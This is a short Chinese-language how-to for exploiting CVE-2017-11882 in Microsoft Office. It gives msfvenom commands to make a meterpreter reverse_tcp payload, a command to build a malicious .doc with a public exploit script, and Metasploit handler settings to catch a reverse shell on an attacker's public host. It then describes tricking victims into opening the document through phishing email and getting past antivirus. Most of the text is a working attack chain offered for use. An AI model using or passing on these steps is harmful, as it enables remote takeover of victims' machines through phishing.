CVE-2017-11882利用

CVE-2017-11882是微软公布的远程执行漏洞，通杀所有office版本及Windows操作系统

工具使用

本文使用的EXP来源于unamer/CVE-2017-11882，然后结合MSF进行渗透

内网一台Windows主机，要求安装Office

外网一台Linux主机，要求安装了MSF，并且该主机拥有一个独立的公网IP(阿里云的主机虽然有公网IP，但是本身是处于内网的，在测试时时无法成功的)

最终外网主机通过反向shell成功控制内网主机

工具制作

1. 制作shellcode

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网IP LPORT=端口号 -o sc.bin
   

2. 生成EXP

   此处python版本为python3

   python CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.doc
   

漏洞利用

攻击者

在公网主机上利用MSF监听指定自定义端口(任意未被绑定端口都可)

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 攻击者IP
set LPORT 自定义端口
run

受害者

通过发送邮件等钓鱼攻击，诱使受害者访问攻击者制作的恶意的DOC文档，一旦用户打开该DOC文档，相应的恶意代码便会自动执行(前提时制作的DOC文档没有被杀毒软件查杀)

• 条件一：用户打开恶意DOC文档
• 条件二：恶意DOC文档未被查杀